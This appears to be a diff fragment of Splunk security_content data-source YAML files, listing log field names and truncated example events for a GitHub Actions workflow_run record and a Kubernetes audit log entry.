- workflow_run.head_branch
|
||||
- workflow_run.head_commit.author.email
|
||||
- workflow_run.head_commit.author.name
|
||||
- workflow_run.head_commit.committer.email
|
||||
- workflow_run.head_commit.committer.name
|
||||
- workflow_run.head_commit.id
|
||||
- workflow_run.head_commit.message
|
||||
- workflow_run.head_commit.timestamp
|
||||
- workflow_run.head_commit.tree_id
|
||||
- workflow_run.head_repository.collaborators_url
|
||||
- workflow_run.head_repository.description
|
||||
- workflow_run.head_repository.fork
|
||||
- workflow_run.head_repository.forks_url
|
||||
- workflow_run.head_repository.full_name
|
||||
- workflow_run.head_repository.hooks_url
|
||||
- workflow_run.head_repository.html_url
|
||||
- workflow_run.head_repository.id
|
||||
- workflow_run.head_repository.keys_url
|
||||
- workflow_run.head_repository.name
|
||||
- workflow_run.head_repository.node_id
|
||||
- workflow_run.head_repository.owner.avatar_url
|
||||
- workflow_run.head_repository.owner.events_url
|
||||
- workflow_run.head_repository.owner.followers_url
|
||||
- workflow_run.head_repository.owner.following_url
|
||||
- workflow_run.head_repository.owner.gists_url
|
||||
- workflow_run.head_repository.owner.gravatar_id
|
||||
- workflow_run.head_repository.owner.html_url
|
||||
- workflow_run.head_repository.owner.id
|
||||
- workflow_run.head_repository.owner.login
|
||||
- workflow_run.head_repository.owner.node_id
|
||||
- workflow_run.head_repository.owner.organizations_url
|
||||
- workflow_run.head_repository.owner.received_events_url
|
||||
- workflow_run.head_repository.owner.repos_url
|
||||
- workflow_run.head_repository.owner.site_admin
|
||||
- workflow_run.head_repository.owner.starred_url
|
||||
- workflow_run.head_repository.owner.subscriptions_url
|
||||
- workflow_run.head_repository.owner.type
|
||||
- workflow_run.head_repository.owner.url
|
||||
- workflow_run.head_repository.private
|
||||
- workflow_run.head_repository.teams_url
|
||||
- workflow_run.head_repository.url
|
||||
- workflow_run.head_sha
|
||||
- workflow_run.html_url
|
||||
- workflow_run.id
|
||||
- workflow_run.jobs_url
|
||||
- workflow_run.logs_url
|
||||
- workflow_run.name
|
||||
- workflow_run.node_id
|
||||
- workflow_run.previous_attempt_url
|
||||
- workflow_run.pull_requests{}.base.ref
|
||||
- workflow_run.pull_requests{}.base.repo.id
|
||||
- workflow_run.pull_requests{}.base.repo.name
|
||||
- workflow_run.pull_requests{}.base.repo.url
|
||||
- workflow_run.pull_requests{}.base.sha
|
||||
- workflow_run.pull_requests{}.head.ref
|
||||
- workflow_run.pull_requests{}.head.repo.id
|
||||
- workflow_run.pull_requests{}.head.repo.name
|
||||
- workflow_run.pull_requests{}.head.repo.url
|
||||
- workflow_run.pull_requests{}.head.sha
|
||||
- workflow_run.pull_requests{}.id
|
||||
- workflow_run.pull_requests{}.number
|
||||
- workflow_run.pull_requests{}.url
|
||||
- workflow_run.repository.archive_url
|
||||
- workflow_run.repository.assignees_url
|
||||
- workflow_run.repository.blobs_url
|
||||
- workflow_run.repository.branches_url
|
||||
- workflow_run.repository.collaborators_url
|
||||
- workflow_run.repository.comments_url
|
||||
- workflow_run.repository.commits_url
|
||||
- workflow_run.repository.compare_url
|
||||
- workflow_run.repository.contents_url
|
||||
- workflow_run.repository.contributors_url
|
||||
- workflow_run.repository.deployments_url
|
||||
- workflow_run.repository.description
|
||||
- workflow_run.repository.downloads_url
|
||||
- workflow_run.repository.events_url
|
||||
- workflow_run.repository.fork
|
||||
- workflow_run.repository.forks_url
|
||||
- workflow_run.repository.full_name
|
||||
- workflow_run.repository.git_commits_url
|
||||
- workflow_run.repository.git_refs_url
|
||||
- workflow_run.repository.git_tags_url
|
||||
- workflow_run.repository.hooks_url
|
||||
- workflow_run.repository.html_url
|
||||
- workflow_run.repository.id
|
||||
- workflow_run.repository.issue_comment_url
|
||||
- workflow_run.repository.issue_events_url
|
||||
- workflow_run.repository.issues_url
|
||||
- workflow_run.repository.keys_url
|
||||
- workflow_run.repository.labels_url
|
||||
- workflow_run.repository.languages_url
|
||||
- workflow_run.repository.merges_url
|
||||
- workflow_run.repository.milestones_url
|
||||
- workflow_run.repository.name
|
||||
- workflow_run.repository.node_id
|
||||
- workflow_run.repository.notifications_url
|
||||
- workflow_run.repository.owner.avatar_url
|
||||
- workflow_run.repository.owner.events_url
|
||||
- workflow_run.repository.owner.followers_url
|
||||
- workflow_run.repository.owner.following_url
|
||||
- workflow_run.repository.owner.gists_url
|
||||
- workflow_run.repository.owner.gravatar_id
|
||||
- workflow_run.repository.owner.html_url
|
||||
- workflow_run.repository.owner.id
|
||||
- workflow_run.repository.owner.login
|
||||
- workflow_run.repository.owner.node_id
|
||||
- workflow_run.repository.owner.organizations_url
|
||||
- workflow_run.repository.owner.received_events_url
|
||||
- workflow_run.repository.owner.repos_url
|
||||
- workflow_run.repository.owner.site_admin
|
||||
- workflow_run.repository.owner.starred_url
|
||||
- workflow_run.repository.owner.subscriptions_url
|
||||
- workflow_run.repository.owner.type
|
||||
- workflow_run.repository.owner.url
|
||||
- workflow_run.repository.private
|
||||
- workflow_run.repository.pulls_url
|
||||
- workflow_run.repository.releases_url
|
||||
- workflow_run.repository.stargazers_url
|
||||
- workflow_run.repository.statuses_url
|
||||
- workflow_run.repository.subscribers_url
|
||||
- workflow_run.repository.subscription_url
|
||||
- workflow_run.repository.tags_url
|
||||
- workflow_run.repository.teams_url
|
||||
- workflow_run.repository.trees_url
|
||||
- workflow_run.repository.url
|
||||
- workflow_run.rerun_url
|
||||
- workflow_run.run_attempt
|
||||
- workflow_run.run_number
|
||||
- workflow_run.run_started_at
|
||||
- workflow_run.status
|
||||
- workflow_run.triggering_actor.avatar_url
|
||||
- workflow_run.triggering_actor.events_url
|
||||
- workflow_run.triggering_actor.followers_url
|
||||
- workflow_run.triggering_actor.following_url
|
||||
- workflow_run.triggering_actor.gists_url
|
||||
- workflow_run.triggering_actor.gravatar_id
|
||||
- workflow_run.triggering_actor.html_url
|
||||
- workflow_run.triggering_actor.id
|
||||
- workflow_run.triggering_actor.login
|
||||
- workflow_run.triggering_actor.node_id
|
||||
- workflow_run.triggering_actor.organizations_url
|
||||
- workflow_run.triggering_actor.received_events_url
|
||||
- workflow_run.triggering_actor.repos_url
|
||||
- workflow_run.triggering_actor.site_admin
|
||||
- workflow_run.triggering_actor.starred_url
|
||||
- workflow_run.triggering_actor.subscriptions_url
|
||||
- workflow_run.triggering_actor.type
|
||||
- workflow_run.triggering_actor.url
|
||||
- workflow_run.updated_at
|
||||
- workflow_run.url
|
||||
- workflow_run.workflow_id
|
||||
- workflow_run.workflow_url
|
||||
example_log: '{"action":"requested","workflow_run":{"id":2088708615,"name":"auto-update","node_id":"WFR_kwLOCa00Ec58fyoH","head_branch":"mac_os_detections","head_sha":"4049334910ea3d52a917ca35aed66d11c80ed966","run_number":9504,"event":"push","status":"queued","conclusion":null,"workflow_id":4692335,"check_suite_id":5918781611,"check_suite_node_id":"CS_kwDOCa00Ec8AAAABYMlwqw","url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615","html_url":"https://github.com/splunk/security_content/actions/runs/2088708615","pull_requests":[{"url":"https://api.github.com/repos/splunk/security_content/pulls/2131","id":893091277,"number":2131,"head":{"ref":"mac_os_detections","sha":"4049334910ea3d52a917ca35aed66d11c80ed966","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}},"base":{"ref":"develop","sha":"a7d3d1dc57f9bf36fe22e470bcf518fcc2c89283","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}}}],"created_at":"2022-04-04T08:43:15Z","updated_at":"2022-04-04T08:43:15Z","actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"run_attempt":1,"run_started_at":"2022-04-04T08:43:15Z","triggering_actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"jobs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/jobs","logs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/logs","check_suite_url":"https://api.github.com/repos/splunk/security_content/check-suites/5918781611","artifacts_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/artifacts","cancel_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/cancel","rerun_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/rerun","previous_attempt_url":null,"workflow_url":"https://api.github.com/repos/splunk/security_content/actions/workflows/4692335","head_commit":{"id":"4049334910ea3d52a917ca35aed66d11c80ed966","tree_id":"df4ddc1359be3b19f093b7a27dbf5708187743a0","message":"small
|
||||
- _time
|
||||
- action
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- meta
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timestamp
|
||||
- workflow_run.actor.avatar_url
|
||||
- workflow_run.actor.events_url
|
||||
- workflow_run.actor.followers_url
|
||||
- workflow_run.actor.following_url
|
||||
- workflow_run.actor.gists_url
|
||||
- workflow_run.actor.gravatar_id
|
||||
- workflow_run.actor.html_url
|
||||
- workflow_run.actor.id
|
||||
- workflow_run.actor.login
|
||||
- workflow_run.actor.node_id
|
||||
- workflow_run.actor.organizations_url
|
||||
- workflow_run.actor.received_events_url
|
||||
- workflow_run.actor.repos_url
|
||||
- workflow_run.actor.site_admin
|
||||
- workflow_run.actor.starred_url
|
||||
- workflow_run.actor.subscriptions_url
|
||||
- workflow_run.actor.type
|
||||
- workflow_run.actor.url
|
||||
- workflow_run.artifacts_url
|
||||
- workflow_run.cancel_url
|
||||
- workflow_run.check_suite_id
|
||||
- workflow_run.check_suite_node_id
|
||||
- workflow_run.check_suite_url
|
||||
- workflow_run.conclusion
|
||||
- workflow_run.created_at
|
||||
- workflow_run.event
|
||||
- workflow_run.head_branch
|
||||
- workflow_run.head_commit.author.email
|
||||
- workflow_run.head_commit.author.name
|
||||
- workflow_run.head_commit.committer.email
|
||||
- workflow_run.head_commit.committer.name
|
||||
- workflow_run.head_commit.id
|
||||
- workflow_run.head_commit.message
|
||||
- workflow_run.head_commit.timestamp
|
||||
- workflow_run.head_commit.tree_id
|
||||
- workflow_run.head_repository.collaborators_url
|
||||
- workflow_run.head_repository.description
|
||||
- workflow_run.head_repository.fork
|
||||
- workflow_run.head_repository.forks_url
|
||||
- workflow_run.head_repository.full_name
|
||||
- workflow_run.head_repository.hooks_url
|
||||
- workflow_run.head_repository.html_url
|
||||
- workflow_run.head_repository.id
|
||||
- workflow_run.head_repository.keys_url
|
||||
- workflow_run.head_repository.name
|
||||
- workflow_run.head_repository.node_id
|
||||
- workflow_run.head_repository.owner.avatar_url
|
||||
- workflow_run.head_repository.owner.events_url
|
||||
- workflow_run.head_repository.owner.followers_url
|
||||
- workflow_run.head_repository.owner.following_url
|
||||
- workflow_run.head_repository.owner.gists_url
|
||||
- workflow_run.head_repository.owner.gravatar_id
|
||||
- workflow_run.head_repository.owner.html_url
|
||||
- workflow_run.head_repository.owner.id
|
||||
- workflow_run.head_repository.owner.login
|
||||
- workflow_run.head_repository.owner.node_id
|
||||
- workflow_run.head_repository.owner.organizations_url
|
||||
- workflow_run.head_repository.owner.received_events_url
|
||||
- workflow_run.head_repository.owner.repos_url
|
||||
- workflow_run.head_repository.owner.site_admin
|
||||
- workflow_run.head_repository.owner.starred_url
|
||||
- workflow_run.head_repository.owner.subscriptions_url
|
||||
- workflow_run.head_repository.owner.type
|
||||
- workflow_run.head_repository.owner.url
|
||||
- workflow_run.head_repository.private
|
||||
- workflow_run.head_repository.teams_url
|
||||
- workflow_run.head_repository.url
|
||||
- workflow_run.head_sha
|
||||
- workflow_run.html_url
|
||||
- workflow_run.id
|
||||
- workflow_run.jobs_url
|
||||
- workflow_run.logs_url
|
||||
- workflow_run.name
|
||||
- workflow_run.node_id
|
||||
- workflow_run.previous_attempt_url
|
||||
- workflow_run.pull_requests{}.base.ref
|
||||
- workflow_run.pull_requests{}.base.repo.id
|
||||
- workflow_run.pull_requests{}.base.repo.name
|
||||
- workflow_run.pull_requests{}.base.repo.url
|
||||
- workflow_run.pull_requests{}.base.sha
|
||||
- workflow_run.pull_requests{}.head.ref
|
||||
- workflow_run.pull_requests{}.head.repo.id
|
||||
- workflow_run.pull_requests{}.head.repo.name
|
||||
- workflow_run.pull_requests{}.head.repo.url
|
||||
- workflow_run.pull_requests{}.head.sha
|
||||
- workflow_run.pull_requests{}.id
|
||||
- workflow_run.pull_requests{}.number
|
||||
- workflow_run.pull_requests{}.url
|
||||
- workflow_run.repository.archive_url
|
||||
- workflow_run.repository.assignees_url
|
||||
- workflow_run.repository.blobs_url
|
||||
- workflow_run.repository.branches_url
|
||||
- workflow_run.repository.collaborators_url
|
||||
- workflow_run.repository.comments_url
|
||||
- workflow_run.repository.commits_url
|
||||
- workflow_run.repository.compare_url
|
||||
- workflow_run.repository.contents_url
|
||||
- workflow_run.repository.contributors_url
|
||||
- workflow_run.repository.deployments_url
|
||||
- workflow_run.repository.description
|
||||
- workflow_run.repository.downloads_url
|
||||
- workflow_run.repository.events_url
|
||||
- workflow_run.repository.fork
|
||||
- workflow_run.repository.forks_url
|
||||
- workflow_run.repository.full_name
|
||||
- workflow_run.repository.git_commits_url
|
||||
- workflow_run.repository.git_refs_url
|
||||
- workflow_run.repository.git_tags_url
|
||||
- workflow_run.repository.hooks_url
|
||||
- workflow_run.repository.html_url
|
||||
- workflow_run.repository.id
|
||||
- workflow_run.repository.issue_comment_url
|
||||
- workflow_run.repository.issue_events_url
|
||||
- workflow_run.repository.issues_url
|
||||
- workflow_run.repository.keys_url
|
||||
- workflow_run.repository.labels_url
|
||||
- workflow_run.repository.languages_url
|
||||
- workflow_run.repository.merges_url
|
||||
- workflow_run.repository.milestones_url
|
||||
- workflow_run.repository.name
|
||||
- workflow_run.repository.node_id
|
||||
- workflow_run.repository.notifications_url
|
||||
- workflow_run.repository.owner.avatar_url
|
||||
- workflow_run.repository.owner.events_url
|
||||
- workflow_run.repository.owner.followers_url
|
||||
- workflow_run.repository.owner.following_url
|
||||
- workflow_run.repository.owner.gists_url
|
||||
- workflow_run.repository.owner.gravatar_id
|
||||
- workflow_run.repository.owner.html_url
|
||||
- workflow_run.repository.owner.id
|
||||
- workflow_run.repository.owner.login
|
||||
- workflow_run.repository.owner.node_id
|
||||
- workflow_run.repository.owner.organizations_url
|
||||
- workflow_run.repository.owner.received_events_url
|
||||
- workflow_run.repository.owner.repos_url
|
||||
- workflow_run.repository.owner.site_admin
|
||||
- workflow_run.repository.owner.starred_url
|
||||
- workflow_run.repository.owner.subscriptions_url
|
||||
- workflow_run.repository.owner.type
|
||||
- workflow_run.repository.owner.url
|
||||
- workflow_run.repository.private
|
||||
- workflow_run.repository.pulls_url
|
||||
- workflow_run.repository.releases_url
|
||||
- workflow_run.repository.stargazers_url
|
||||
- workflow_run.repository.statuses_url
|
||||
- workflow_run.repository.subscribers_url
|
||||
- workflow_run.repository.subscription_url
|
||||
- workflow_run.repository.tags_url
|
||||
- workflow_run.repository.teams_url
|
||||
- workflow_run.repository.trees_url
|
||||
- workflow_run.repository.url
|
||||
- workflow_run.rerun_url
|
||||
- workflow_run.run_attempt
|
||||
- workflow_run.run_number
|
||||
- workflow_run.run_started_at
|
||||
- workflow_run.status
|
||||
- workflow_run.triggering_actor.avatar_url
|
||||
- workflow_run.triggering_actor.events_url
|
||||
- workflow_run.triggering_actor.followers_url
|
||||
- workflow_run.triggering_actor.following_url
|
||||
- workflow_run.triggering_actor.gists_url
|
||||
- workflow_run.triggering_actor.gravatar_id
|
||||
- workflow_run.triggering_actor.html_url
|
||||
- workflow_run.triggering_actor.id
|
||||
- workflow_run.triggering_actor.login
|
||||
- workflow_run.triggering_actor.node_id
|
||||
- workflow_run.triggering_actor.organizations_url
|
||||
- workflow_run.triggering_actor.received_events_url
|
||||
- workflow_run.triggering_actor.repos_url
|
||||
- workflow_run.triggering_actor.site_admin
|
||||
- workflow_run.triggering_actor.starred_url
|
||||
- workflow_run.triggering_actor.subscriptions_url
|
||||
- workflow_run.triggering_actor.type
|
||||
- workflow_run.triggering_actor.url
|
||||
- workflow_run.updated_at
|
||||
- workflow_run.url
|
||||
- workflow_run.workflow_id
|
||||
- workflow_run.workflow_url
|
||||
example_log:
|
||||
'{"action":"requested","workflow_run":{"id":2088708615,"name":"auto-update","node_id":"WFR_kwLOCa00Ec58fyoH","head_branch":"mac_os_detections","head_sha":"4049334910ea3d52a917ca35aed66d11c80ed966","run_number":9504,"event":"push","status":"queued","conclusion":null,"workflow_id":4692335,"check_suite_id":5918781611,"check_suite_node_id":"CS_kwDOCa00Ec8AAAABYMlwqw","url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615","html_url":"https://github.com/splunk/security_content/actions/runs/2088708615","pull_requests":[{"url":"https://api.github.com/repos/splunk/security_content/pulls/2131","id":893091277,"number":2131,"head":{"ref":"mac_os_detections","sha":"4049334910ea3d52a917ca35aed66d11c80ed966","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}},"base":{"ref":"develop","sha":"a7d3d1dc57f9bf36fe22e470bcf518fcc2c89283","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}}}],"created_at":"2022-04-04T08:43:15Z","updated_at":"2022-04-04T08:43:15Z","actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"run_attempt":1,"run_started_at":"2022-04-04T08:43:15Z","triggering_actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"jobs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/jobs","logs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/logs","check_suite_url":"https://api.github.com/repos/splunk/security_content/check-suites/5918781611","artifacts_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/artifacts","cancel_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/cancel","rerun_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/rerun","previous_attempt_url":null,"workflow_url":"https://api.github.com/repos/splunk/security_content/actions/workflows/4692335","head_commit":{"id":"4049334910ea3d52a917ca35aed66d11c80ed966","tree_id":"df4ddc1359be3b19f093b7a27dbf5708187743a0","message":"small
|
||||
change","timestamp":"2022-04-04T08:43:01Z","author":{"name":"jsmith","email":"jsmith@evilcorp.com"},"committer":{"name":"jsmith","email":"jsmith@evilcorp.com"}},"repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
|
||||
Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/number}","events_url":"https://api.github.com/repos/splunk/security_content/events","assignees_url":"https://api.github.com/repos/splunk/security_content/assignees{/user}","branches_url":"https://api.github.com/repos/splunk/security_content/branches{/branch}","tags_url":"https://api.github.com/repos/splunk/security_content/tags","blobs_url":"https://api.github.com/repos/splunk/security_content/git/blobs{/sha}","git_tags_url":"https://api.github.com/repos/splunk/security_content/git/tags{/sha}","git_refs_url":"https://api.github.com/repos/splunk/security_content/git/refs{/sha}","trees_url":"https://api.github.com/repos/splunk/security_content/git/trees{/sha}","statuses_url":"https://api.github.com/repos/splunk/security_content/statuses/{sha}","languages_url":"https://api.github.com/repos/splunk/security_content/languages","stargazers_url":"https://api.github.com/repos/splunk/security_content/stargazers","contributors_url":"https://api.github.com/repos/splunk/security_content/contributors","subscribers_url":"https://api.github.com/repos/splunk/security_content/subscribers","subscription_url":"https://api.github.com/repos/splunk/security_content/subscription","commits_url":"https://api.github.com/repos/splunk/security_content/commits{/sha}","git_commits_url":"https://api.github.com/repos/splunk/security_content/git/commits{/sha}","comments_url":"https://api.github.com/repos/splunk/security_content/comments{/number}","issue_comment_url":"https://api.github.com/repos/splunk/security_content/issues/comments{/number}","contents_url":"https://api.github.com/repos/splunk/security_content/contents/{+path}","compare_url":"https://api.github.com/repos/splunk/security_content/compare/{base}...{head}","merges_url":"https://api.github.com/repos/splunk/security_content/merges","archive_url":"https://api.github.com/repos/splunk/security_content/{archive_format}{/ref}","downloads_url":"https://api.github.com/repos/splunk/security_content/downloads","issues_url":"https://api.github.com/repos/splunk/security_content/issues{/number}","pulls_url":"https://api.github.com/repos/splunk/security_content/pulls{/number}","milestones_url":"https://api.github.com/repos/splunk/security_content/milestones{/number}","notifications_url":"https://api.github.com/repos/splunk/security_content/notifications{?since,all,participating}","labels_url":"https://api.github.com/repos/splunk/security_content/labels{/name}","releases_url":"https://api.github.com/repos/splunk/security_content/releases{/id}","deployments_url":"https://api.github.com/repos/splunk/security_content/deployments"},"head_repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
|
||||
Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/num'
|
||||
|
||||
@@ -3,57 +3,57 @@ id: 6c25181a-0c07-4aaf-90e6-77ab1f0e6699
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: kubernetes
|
||||
sourcetype: _json
|
||||
separator: null
|
||||
supported_TA: {}
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- annotations.authorization.k8s.io/decision
|
||||
- annotations.authorization.k8s.io/reason
|
||||
- apiVersion
|
||||
- auditID
|
||||
- eventtype
|
||||
- host
|
||||
- index
|
||||
- kind
|
||||
- level
|
||||
- linecount
|
||||
- objectRef.apiGroup
|
||||
- objectRef.apiVersion
|
||||
- objectRef.namespace
|
||||
- objectRef.resource
|
||||
- punct
|
||||
- requestReceivedTimestamp
|
||||
- requestURI
|
||||
- responseObject.apiVersion
|
||||
- responseObject.code
|
||||
- responseObject.details.group
|
||||
- responseObject.details.kind
|
||||
- responseObject.kind
|
||||
- responseObject.message
|
||||
- responseObject.reason
|
||||
- responseObject.status
|
||||
- responseStatus.code
|
||||
- responseStatus.details.group
|
||||
- responseStatus.details.kind
|
||||
- responseStatus.message
|
||||
- responseStatus.reason
|
||||
- responseStatus.status
|
||||
- source
|
||||
- sourceIPs{}
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- stage
|
||||
- stageTimestamp
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timestamp
|
||||
- user.groups{}
|
||||
- user.uid
|
||||
- user.username
|
||||
- userAgent
|
||||
- verb
|
||||
example_log: '{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"582c31ab-4906-49bb-9ff9-872f980ccb84","stage":"ResponseComplete","requestURI":"/apis/batch/v1/namespaces/test2/jobs?fieldManager=kubectl-create\u0026fieldValidation=Strict","verb":"create","user":{"username":"k8s-test-user","uid":"aws-iam-authenticator:591511147606:AROAYTOGP2RLFHNBOTP5J","groups":["system:authenticated"]},"sourceIPs":["176.95.188.101"],"userAgent":"kubectl/v1.27.2
|
||||
- _time
|
||||
- annotations.authorization.k8s.io/decision
|
||||
- annotations.authorization.k8s.io/reason
|
||||
- apiVersion
|
||||
- auditID
|
||||
- eventtype
|
||||
- host
|
||||
- index
|
||||
- kind
|
||||
- level
|
||||
- linecount
|
||||
- objectRef.apiGroup
|
||||
- objectRef.apiVersion
|
||||
- objectRef.namespace
|
||||
- objectRef.resource
|
||||
- punct
|
||||
- requestReceivedTimestamp
|
||||
- requestURI
|
||||
- responseObject.apiVersion
|
||||
- responseObject.code
|
||||
- responseObject.details.group
|
||||
- responseObject.details.kind
|
||||
- responseObject.kind
|
||||
- responseObject.message
|
||||
- responseObject.reason
|
||||
- responseObject.status
|
||||
- responseStatus.code
|
||||
- responseStatus.details.group
|
||||
- responseStatus.details.kind
|
||||
- responseStatus.message
|
||||
- responseStatus.reason
|
||||
- responseStatus.status
|
||||
- source
|
||||
- sourceIPs{}
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- stage
|
||||
- stageTimestamp
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timestamp
|
||||
- user.groups{}
|
||||
- user.uid
|
||||
- user.username
|
||||
- userAgent
|
||||
- verb
|
||||
example_log:
|
||||
'{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"582c31ab-4906-49bb-9ff9-872f980ccb84","stage":"ResponseComplete","requestURI":"/apis/batch/v1/namespaces/test2/jobs?fieldManager=kubectl-create\u0026fieldValidation=Strict","verb":"create","user":{"username":"k8s-test-user","uid":"aws-iam-authenticator:591511147606:AROAYTOGP2RLFHNBOTP5J","groups":["system:authenticated"]},"sourceIPs":["176.95.188.101"],"userAgent":"kubectl/v1.27.2
|
||||
